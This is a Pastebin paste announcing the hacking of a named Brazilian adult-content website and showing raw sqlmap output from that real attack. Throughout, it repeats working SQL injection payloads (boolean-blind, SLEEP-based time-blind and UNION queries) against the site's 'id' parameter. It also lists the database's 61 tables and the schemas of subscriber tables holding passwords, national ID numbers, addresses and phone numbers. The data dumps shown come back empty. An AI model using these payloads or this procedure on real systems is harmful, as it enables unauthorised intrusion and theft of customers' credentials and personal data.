zTr3v0r

www.brasileirinhas.com.br HACKED BY Tr3v0r

Jul 19th, 2017
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 27.67 KB | None | 0 0
  1. sqlmap resumed the following injection point(s) from stored session:
  2. ---
  3. Parameter: id (GET)
  4. Type: boolean-based blind
  5. Title: AND boolean-based blind - WHERE or HAVING clause
  6. Payload: str=babalu&id=46 AND 7053=7053
  7.  
  8. Type: AND/OR time-based blind
  9. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  10. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  11.  
  12. Type: UNION query
  13. Title: Generic UNION query (49) - 5 columns
  14. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  15. ---
  16. web application technology: Apache
  17. back-end DBMS: MySQL 5.0.12
  18. Database: brasileirinhas
  19. [61 tables]
  20. +-------------------------------+
  21. | Teste |
  22. | acessos_Assinante |
  23. | acessos_online |
  24. | assinantesUol |
  25. | assinates |
  26. | bannerHome |
  27. | buscas |
  28. | categoria_x_cenas |
  29. | categorias |
  30. | categorias_usuarios |
  31. | cena_x_garotas |
  32. | cenas |
  33. | cenasFotos |
  34. | cenas_alugados |
  35. | clientes_moedaSegura |
  36. | comentarios |
  37. | configuracoes_categorias_user |
  38. | configuracoes_user |
  39. | destaques_home |
  40. | ensaioFotos |
  41. | ensaios |
  42. | error |
  43. | filmes |
  44. | filmes_alugados |
  45. | filmes_assistidos_usuarios |
  46. | filmes_assistindo_usuarios |
  47. | filmes_favoritos_usuarios |
  48. | filmes_selecionados_usuarios |
  49. | filmes_visualizados_usuarios |
  50. | filmes_votos_usuarios |
  51. | garotas |
  52. | garotas_descricoes |
  53. | generos |
  54. | generos_x_filmes |
  55. | globoSat |
  56. | home_categorias_listagem |
  57. | logAcessosAssinantes |
  58. | logAcessosAssinantes2 |
  59. | metaPaginas |
  60. | movie_control |
  61. | paises |
  62. | parceiros_amadoras |
  63. | parceiros_buttman |
  64. | parceiros_explicita |
  65. | pd_items_cmts |
  66. | pd_items_likes |
  67. | pd_photos |
  68. | pd_profiles |
  69. | planos |
  70. | pornstar_visualizacoes |
  71. | pornstar_votos_usuarios |
  72. | qrcode |
  73. | qrcode_acessos |
  74. | queryLog |
  75. | sitmap |
  76. | tags |
  77. | user_block |
  78. | usuarios |
  79. | usuariosAssinantes |
  80. | wallpapers |
  81. | wallpapers_x_garotas |
  82. +-------------------------------+
  83.  
  84. sqlmap resumed the following injection point(s) from stored session:
  85. ---
  86. Parameter: id (GET)
  87. Type: boolean-based blind
  88. Title: AND boolean-based blind - WHERE or HAVING clause
  89. Payload: str=babalu&id=46 AND 7053=7053
  90.  
  91. Type: AND/OR time-based blind
  92. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  93. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  94.  
  95. Type: UNION query
  96. Title: Generic UNION query (49) - 5 columns
  97. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  98. ---
  99. web application technology: Apache
  100. back-end DBMS: MySQL 5.0.12
  101. Database: brasileirinhas
  102. Table: assinates
  103. [42 columns]
  104. +---------------------------+--------------+
  105. | Column | Type |
  106. +---------------------------+--------------+
  107. | asnt_forma_pgto | int(3) |
  108. | asnt_id | varchar(30) |
  109. | asnt_informacao_associado | varchar(20) |
  110. | asnt_login | varchar(200) |
  111. | asnt_renovacao | varchar(30) |
  112. | asnt_senha | varchar(20) |
  113. | ativo | int(2) |
  114. | bairro | varchar(255) |
  115. | cep | varchar(10) |
  116. | cidade | varchar(255) |
  117. | codigo_autenticacao | varchar(255) |
  118. | contrato | float |
  119. | cpf_cnpj | varchar(25) |
  120. | ddd_cel | varchar(3) |
  121. | ddd_com | varchar(3) |
  122. | ddd_res | varchar(3) |
  123. | dt_cadastro | date |
  124. | dt_nascimento | date |
  125. | dt_status | datetime |
  126. | dt_validade | date |
  127. | dt_visita | datetime |
  128. | email | varchar(255) |
  129. | email_terra | varchar(255) |
  130. | endereco | varchar(255) |
  131. | estado | varchar(2) |
  132. | id | int(11) |
  133. | logou | int(11) |
  134. | nome | varchar(255) |
  135. | paga_id | int(11) |
  136. | paga_numero | int(11) |
  137. | plano_dias | int(4) |
  138. | plano_id | int(6) |
  139. | rg | varchar(25) |
  140. | senha | varchar(255) |
  141. | sexo | varchar(1) |
  142. | site | varchar(255) |
  143. | situ_id | int(4) |
  144. | status | int(11) |
  145. | telefone_cel | varchar(10) |
  146. | telefone_com | varchar(10) |
  147. | telefone_res | varchar(10) |
  148. | usuario | varchar(255) |
  149. +---------------------------+--------------+
  150.  
  151. sqlmap resumed the following injection point(s) from stored session:
  152. ---
  153. Parameter: id (GET)
  154. Type: boolean-based blind
  155. Title: AND boolean-based blind - WHERE or HAVING clause
  156. Payload: str=babalu&id=46 AND 7053=7053
  157.  
  158. Type: AND/OR time-based blind
  159. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  160. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  161.  
  162. Type: UNION query
  163. Title: Generic UNION query (49) - 5 columns
  164. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  165. ---
  166. web application technology: Apache
  167. back-end DBMS: MySQL 5.0.12
  168. Database: brasileirinhas
  169. Table: assinates
  170. [0 entries]
  171. +---------+-------+
  172. | usuario | senha |
  173. +---------+-------+
  174. +---------+-------+
  175.  
  176. sqlmap resumed the following injection point(s) from stored session:
  177. ---
  178. Parameter: id (GET)
  179. Type: boolean-based blind
  180. Title: AND boolean-based blind - WHERE or HAVING clause
  181. Payload: str=babalu&id=46 AND 7053=7053
  182.  
  183. Type: AND/OR time-based blind
  184. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  185. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  186.  
  187. Type: UNION query
  188. Title: Generic UNION query (49) - 5 columns
  189. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  190. ---
  191. web application technology: Apache
  192. back-end DBMS: MySQL 5.0.12
  193. Database: brasileirinhas
  194. Table: assinates
  195. [43 columns]
  196. +---------------------------+--------------+
  197. | Column | Type |
  198. +---------------------------+--------------+
  199. | asnt_forma_pgto | int(3) |
  200. | asnt_id | varchar(30) |
  201. | asnt_informacao_associado | varchar(20) |
  202. | asnt_login | varchar(200) |
  203. | asnt_renovacao | varchar(30) |
  204. | asnt_senha | varchar(20) |
  205. | ativo | int(2) |
  206. | bairro | varchar(255) |
  207. | cep | varchar(10) |
  208. | cidade | varchar(255) |
  209. | codigo_autenticacao | varchar(255) |
  210. | contrato | float |
  211. | cpf_cnpj | varchar(25) |
  212. | ddd_cel | varchar(3) |
  213. | ddd_com | varchar(3) |
  214. | ddd_res | varchar(3) |
  215. | dt_cadastro | date |
  216. | dt_nascimento | date |
  217. | dt_status | datetime |
  218. | dt_validade | date |
  219. | dt_visita | datetime |
  220. | email | varchar(255) |
  221. | email_terra | varchar(255) |
  222. | endereco | varchar(255) |
  223. | estado | varchar(2) |
  224. | id | int(11) |
  225. | logou | int(11) |
  226. | nome | varchar(255) |
  227. | paga_id | int(11) |
  228. | paga_numero | int(11) |
  229. | parceiro | varchar(255) |
  230. | plano_dias | int(4) |
  231. | plano_id | int(6) |
  232. | rg | varchar(25) |
  233. | senha | varchar(255) |
  234. | sexo | varchar(1) |
  235. | site | varchar(255) |
  236. | situ_id | int(4) |
  237. | status | int(11) |
  238. | telefone_cel | varchar(10) |
  239. | telefone_com | varchar(10) |
  240. | telefone_res | varchar(10) |
  241. | usuario | varchar(255) |
  242. +---------------------------+--------------+
  243.  
  244. sqlmap resumed the following injection point(s) from stored session:
  245. ---
  246. Parameter: id (GET)
  247. Type: boolean-based blind
  248. Title: AND boolean-based blind - WHERE or HAVING clause
  249. Payload: str=babalu&id=46 AND 7053=7053
  250.  
  251. Type: AND/OR time-based blind
  252. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  253. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  254.  
  255. Type: UNION query
  256. Title: Generic UNION query (49) - 5 columns
  257. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  258. ---
  259. web application technology: Apache
  260. back-end DBMS: MySQL 5.0.12
  261. Database: brasileirinhas
  262. Table: assinates
  263. [0 entries]
  264. +------------+------------+
  265. | asnt_login | asnt_senha |
  266. +------------+------------+
  267. +------------+------------+
  268.  
  269. sqlmap resumed the following injection point(s) from stored session:
  270. ---
  271. Parameter: id (GET)
  272. Type: boolean-based blind
  273. Title: AND boolean-based blind - WHERE or HAVING clause
  274. Payload: str=babalu&id=46 AND 7053=7053
  275.  
  276. Type: AND/OR time-based blind
  277. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  278. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  279.  
  280. Type: UNION query
  281. Title: Generic UNION query (49) - 5 columns
  282. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  283. ---
  284. web application technology: Apache
  285. back-end DBMS: MySQL 5.0.12
  286. Database: brasileirinhas
  287. Table: assinates
  288. [0 entries]
  289. +----+--------+---------+---------+---------+----------+-------------+----+-----+------+------+------+-------+-------+-------+-------+--------+--------+--------+---------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+--------------+--------------+--------------+---------------+----------------+-----------------+---------------------+---------------------------+
  290. | id | cidade | situ_id | asnt_id | paga_id | plano_id | dt_validade | rg | cep | site | nome | sexo | senha | email | logou | ativo | status | bairro | estado | ddd_res | ddd_cel | usuario | ddd_com | parceiro | contrato | cpf_cnpj | endereco | dt_status | dt_visita | plano_dias | asnt_login | asnt_senha | email_terra | paga_numero | dt_cadastro | telefone_cel | telefone_res | telefone_com | dt_nascimento | asnt_renovacao | asnt_forma_pgto | codigo_autenticacao | asnt_informacao_associado |
  291. +----+--------+---------+---------+---------+----------+-------------+----+-----+------+------+------+-------+-------+-------+-------+--------+--------+--------+---------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+--------------+--------------+--------------+---------------+----------------+-----------------+---------------------+---------------------------+
  292. +----+--------+---------+---------+---------+----------+-------------+----+-----+------+------+------+-------+-------+-------+-------+--------+--------+--------+---------+---------+---------+---------+----------+----------+----------+----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+--------------+--------------+--------------+---------------+----------------+-----------------+---------------------+---------------------------+
  293.  
  294. sqlmap resumed the following injection point(s) from stored session:
  295. ---
  296. Parameter: id (GET)
  297. Type: boolean-based blind
  298. Title: AND boolean-based blind - WHERE or HAVING clause
  299. Payload: str=babalu&id=46 AND 7053=7053
  300.  
  301. Type: AND/OR time-based blind
  302. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  303. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  304.  
  305. Type: UNION query
  306. Title: Generic UNION query (49) - 5 columns
  307. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  308. ---
  309. web application technology: Apache
  310. back-end DBMS: MySQL 5.0.12
  311. Database: brasileirinhas
  312. [61 tables]
  313. +-------------------------------+
  314. | Teste |
  315. | acessos_Assinante |
  316. | acessos_online |
  317. | assinantesUol |
  318. | assinates |
  319. | bannerHome |
  320. | buscas |
  321. | categoria_x_cenas |
  322. | categorias |
  323. | categorias_usuarios |
  324. | cena_x_garotas |
  325. | cenas |
  326. | cenasFotos |
  327. | cenas_alugados |
  328. | clientes_moedaSegura |
  329. | comentarios |
  330. | configuracoes_categorias_user |
  331. | configuracoes_user |
  332. | destaques_home |
  333. | ensaioFotos |
  334. | ensaios |
  335. | error |
  336. | filmes |
  337. | filmes_alugados |
  338. | filmes_assistidos_usuarios |
  339. | filmes_assistindo_usuarios |
  340. | filmes_favoritos_usuarios |
  341. | filmes_selecionados_usuarios |
  342. | filmes_visualizados_usuarios |
  343. | filmes_votos_usuarios |
  344. | garotas |
  345. | garotas_descricoes |
  346. | generos |
  347. | generos_x_filmes |
  348. | globoSat |
  349. | home_categorias_listagem |
  350. | logAcessosAssinantes |
  351. | logAcessosAssinantes2 |
  352. | metaPaginas |
  353. | movie_control |
  354. | paises |
  355. | parceiros_amadoras |
  356. | parceiros_buttman |
  357. | parceiros_explicita |
  358. | pd_items_cmts |
  359. | pd_items_likes |
  360. | pd_photos |
  361. | pd_profiles |
  362. | planos |
  363. | pornstar_visualizacoes |
  364. | pornstar_votos_usuarios |
  365. | qrcode |
  366. | qrcode_acessos |
  367. | queryLog |
  368. | sitmap |
  369. | tags |
  370. | user_block |
  371. | usuarios |
  372. | usuariosAssinantes |
  373. | wallpapers |
  374. | wallpapers_x_garotas |
  375. +-------------------------------+
  376.  
  377. sqlmap resumed the following injection point(s) from stored session:
  378. ---
  379. Parameter: id (GET)
  380. Type: boolean-based blind
  381. Title: AND boolean-based blind - WHERE or HAVING clause
  382. Payload: str=babalu&id=46 AND 7053=7053
  383.  
  384. Type: AND/OR time-based blind
  385. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  386. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  387.  
  388. Type: UNION query
  389. Title: Generic UNION query (49) - 5 columns
  390. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  391. ---
  392. web application technology: Apache
  393. back-end DBMS: MySQL 5.0.12
  394. Database: brasileirinhas
  395. [61 tables]
  396. +-------------------------------+
  397. | Teste |
  398. | acessos_Assinante |
  399. | acessos_online |
  400. | assinantesUol |
  401. | assinates |
  402. | bannerHome |
  403. | buscas |
  404. | categoria_x_cenas |
  405. | categorias |
  406. | categorias_usuarios |
  407. | cena_x_garotas |
  408. | cenas |
  409. | cenasFotos |
  410. | cenas_alugados |
  411. | clientes_moedaSegura |
  412. | comentarios |
  413. | configuracoes_categorias_user |
  414. | configuracoes_user |
  415. | destaques_home |
  416. | ensaioFotos |
  417. | ensaios |
  418. | error |
  419. | filmes |
  420. | filmes_alugados |
  421. | filmes_assistidos_usuarios |
  422. | filmes_assistindo_usuarios |
  423. | filmes_favoritos_usuarios |
  424. | filmes_selecionados_usuarios |
  425. | filmes_visualizados_usuarios |
  426. | filmes_votos_usuarios |
  427. | garotas |
  428. | garotas_descricoes |
  429. | generos |
  430. | generos_x_filmes |
  431. | globoSat |
  432. | home_categorias_listagem |
  433. | logAcessosAssinantes |
  434. | logAcessosAssinantes2 |
  435. | metaPaginas |
  436. | movie_control |
  437. | paises |
  438. | parceiros_amadoras |
  439. | parceiros_buttman |
  440. | parceiros_explicita |
  441. | pd_items_cmts |
  442. | pd_items_likes |
  443. | pd_photos |
  444. | pd_profiles |
  445. | planos |
  446. | pornstar_visualizacoes |
  447. | pornstar_votos_usuarios |
  448. | qrcode |
  449. | qrcode_acessos |
  450. | queryLog |
  451. | sitmap |
  452. | tags |
  453. | user_block |
  454. | usuarios |
  455. | usuariosAssinantes |
  456. | wallpapers |
  457. | wallpapers_x_garotas |
  458. +-------------------------------+
  459.  
  460. sqlmap resumed the following injection point(s) from stored session:
  461. ---
  462. Parameter: id (GET)
  463. Type: boolean-based blind
  464. Title: AND boolean-based blind - WHERE or HAVING clause
  465. Payload: str=babalu&id=46 AND 7053=7053
  466.  
  467. Type: AND/OR time-based blind
  468. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  469. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  470.  
  471. Type: UNION query
  472. Title: Generic UNION query (49) - 5 columns
  473. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  474. ---
  475. web application technology: Apache
  476. back-end DBMS: MySQL 5.0.12
  477. Database: brasileirinhas
  478. Table: acessos_online
  479. [3 columns]
  480. +--------+--------------+
  481. | Column | Type |
  482. +--------+--------------+
  483. | TIME | int(12) |
  484. | ip | varchar(255) |
  485. | logado | varchar(20) |
  486. +--------+--------------+
  487.  
  488. sqlmap resumed the following injection point(s) from stored session:
  489. ---
  490. Parameter: id (GET)
  491. Type: boolean-based blind
  492. Title: AND boolean-based blind - WHERE or HAVING clause
  493. Payload: str=babalu&id=46 AND 7053=7053
  494.  
  495. Type: AND/OR time-based blind
  496. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  497. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  498.  
  499. Type: UNION query
  500. Title: Generic UNION query (49) - 5 columns
  501. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  502. ---
  503. web application technology: Apache
  504. back-end DBMS: MySQL 5.0.12
  505. Database: brasileirinhas
  506. [61 tables]
  507. +-------------------------------+
  508. | Teste |
  509. | acessos_Assinante |
  510. | acessos_online |
  511. | assinantesUol |
  512. | assinates |
  513. | bannerHome |
  514. | buscas |
  515. | categoria_x_cenas |
  516. | categorias |
  517. | categorias_usuarios |
  518. | cena_x_garotas |
  519. | cenas |
  520. | cenasFotos |
  521. | cenas_alugados |
  522. | clientes_moedaSegura |
  523. | comentarios |
  524. | configuracoes_categorias_user |
  525. | configuracoes_user |
  526. | destaques_home |
  527. | ensaioFotos |
  528. | ensaios |
  529. | error |
  530. | filmes |
  531. | filmes_alugados |
  532. | filmes_assistidos_usuarios |
  533. | filmes_assistindo_usuarios |
  534. | filmes_favoritos_usuarios |
  535. | filmes_selecionados_usuarios |
  536. | filmes_visualizados_usuarios |
  537. | filmes_votos_usuarios |
  538. | garotas |
  539. | garotas_descricoes |
  540. | generos |
  541. | generos_x_filmes |
  542. | globoSat |
  543. | home_categorias_listagem |
  544. | logAcessosAssinantes |
  545. | logAcessosAssinantes2 |
  546. | metaPaginas |
  547. | movie_control |
  548. | paises |
  549. | parceiros_amadoras |
  550. | parceiros_buttman |
  551. | parceiros_explicita |
  552. | pd_items_cmts |
  553. | pd_items_likes |
  554. | pd_photos |
  555. | pd_profiles |
  556. | planos |
  557. | pornstar_visualizacoes |
  558. | pornstar_votos_usuarios |
  559. | qrcode |
  560. | qrcode_acessos |
  561. | queryLog |
  562. | sitmap |
  563. | tags |
  564. | user_block |
  565. | usuarios |
  566. | usuariosAssinantes |
  567. | wallpapers |
  568. | wallpapers_x_garotas |
  569. +-------------------------------+
  570.  
  571. sqlmap resumed the following injection point(s) from stored session:
  572. ---
  573. Parameter: id (GET)
  574. Type: boolean-based blind
  575. Title: AND boolean-based blind - WHERE or HAVING clause
  576. Payload: str=babalu&id=46 AND 7053=7053
  577.  
  578. Type: AND/OR time-based blind
  579. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  580. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  581.  
  582. Type: UNION query
  583. Title: Generic UNION query (49) - 5 columns
  584. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  585. ---
  586. web application technology: Apache
  587. back-end DBMS: MySQL 5.0.12
  588. Database: brasileirinhas
  589. Table: acessos_Assinante
  590. [4 columns]
  591. +-----------+--------------+
  592. | Column | Type |
  593. +-----------+--------------+
  594. | data | datetime |
  595. | idUser | int(9) |
  596. | ip | varchar(255) |
  597. | userAgent | varchar(250) |
  598. +-----------+--------------+
  599.  
  600. sqlmap resumed the following injection point(s) from stored session:
  601. ---
  602. Parameter: id (GET)
  603. Type: boolean-based blind
  604. Title: AND boolean-based blind - WHERE or HAVING clause
  605. Payload: str=babalu&id=46 AND 7053=7053
  606.  
  607. Type: AND/OR time-based blind
  608. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  609. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  610.  
  611. Type: UNION query
  612. Title: Generic UNION query (49) - 5 columns
  613. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  614. ---
  615. web application technology: Apache
  616. back-end DBMS: MySQL 5.0.12
  617. Database: brasileirinhas
  618. Table: usuariosAssinantes
  619. [3 columns]
  620. +--------+--------------+
  621. | Column | Type |
  622. +--------+--------------+
  623. | ativo | int(2) |
  624. | email | varchar(100) |
  625. | senha | varchar(150) |
  626. +--------+--------------+
  627.  
  628. sqlmap resumed the following injection point(s) from stored session:
  629. ---
  630. Parameter: id (GET)
  631. Type: boolean-based blind
  632. Title: AND boolean-based blind - WHERE or HAVING clause
  633. Payload: str=babalu&id=46 AND 7053=7053
  634.  
  635. Type: AND/OR time-based blind
  636. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  637. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  638.  
  639. Type: UNION query
  640. Title: Generic UNION query (49) - 5 columns
  641. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  642. ---
  643. web application technology: Apache
  644. back-end DBMS: MySQL 5.0.12
  645. Database: brasileirinhas
  646. Table: usuariosAssinantes
  647. [3 columns]
  648. +--------+--------------+
  649. | Column | Type |
  650. +--------+--------------+
  651. | ativo | int(2) |
  652. | email | varchar(100) |
  653. | senha | varchar(150) |
  654. +--------+--------------+
  655.  
  656. sqlmap resumed the following injection point(s) from stored session:
  657. ---
  658. Parameter: id (GET)
  659. Type: boolean-based blind
  660. Title: AND boolean-based blind - WHERE or HAVING clause
  661. Payload: str=babalu&id=46 AND 7053=7053
  662.  
  663. Type: AND/OR time-based blind
  664. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  665. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  666.  
  667. Type: UNION query
  668. Title: Generic UNION query (49) - 5 columns
  669. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  670. ---
  671. web application technology: Apache
  672. back-end DBMS: MySQL 5.0.12
  673. Database: brasileirinhas
  674. Table: usuariosAssinantes
  675. [3 columns]
  676. +--------+--------------+
  677. | Column | Type |
  678. +--------+--------------+
  679. | ativo | int(2) |
  680. | email | varchar(100) |
  681. | senha | varchar(150) |
  682. +--------+--------------+
  683.  
  684. sqlmap resumed the following injection point(s) from stored session:
  685. ---
  686. Parameter: id (GET)
  687. Type: boolean-based blind
  688. Title: AND boolean-based blind - WHERE or HAVING clause
  689. Payload: str=babalu&id=46 AND 7053=7053
  690.  
  691. Type: AND/OR time-based blind
  692. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  693. Payload: str=babalu&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))ohAI)
  694.  
  695. Type: UNION query
  696. Title: Generic UNION query (49) - 5 columns
  697. Payload: str=babalu&id=-8075 UNION ALL SELECT 49,49,49,CONCAT(0x716a626b71,0x71736a565a4761425270664a4341746544694b634353637a5262655077447743436b5a48646b5074,0x7171766a71),49-- TaFz
  698. ---
  699. web application technology: Apache
  700. back-end DBMS: MySQL 5.0.12
  701. Database: brasileirinhas
  702. Table: usuariosAssinantes
  703. [3 columns]
  704. +--------+--------------+
  705. | Column | Type |
  706. +--------+--------------+
  707. | ativo | int(2) |
  708. | email | varchar(100) |
  709. | senha | varchar(150) |
  710. +--------+--------------+
Add Comment
Please, Sign In to add comment